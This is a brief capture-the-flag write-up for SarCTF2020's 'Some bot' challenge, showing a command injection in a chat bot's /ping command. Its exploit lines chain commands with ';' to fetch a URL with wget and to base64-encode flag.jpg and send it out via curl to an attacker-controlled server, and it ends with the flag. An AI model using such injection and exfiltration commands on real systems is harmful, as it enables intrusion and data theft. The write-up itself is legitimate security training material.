Some bot [web]
SarCTF2020

Some bot

It’s a well-known fact that Sherlock was on something to have these kinds of superpowers. However, it’s only partly true because he messed up somewhere.

  • URL: https://vk.com/club188138010

Command injection

Bot has /ping 127.0.0.1 command. We can terminate the shell command with ; (| is blacklisted) to achieve code execution. To test this we can issue:

/ping 127.0.0.1;wget "http://my_server/lol"

We send ls, see that flag.jpg is in the directory, send to our server as base64.

Exploit

/ping 127.0.0.1;a=$(base64 -w0 flag.jpg); curl -H "Flag: $a" "http://my_server/lol"

img

Pro-tip: listen on the server using ngrep -qt -W byline port 80 to easily see incoming connections.

Locally we convert the base64 to an image file:

img2

Flag

FLAG{c0mmand_injecti0n_in_b0t}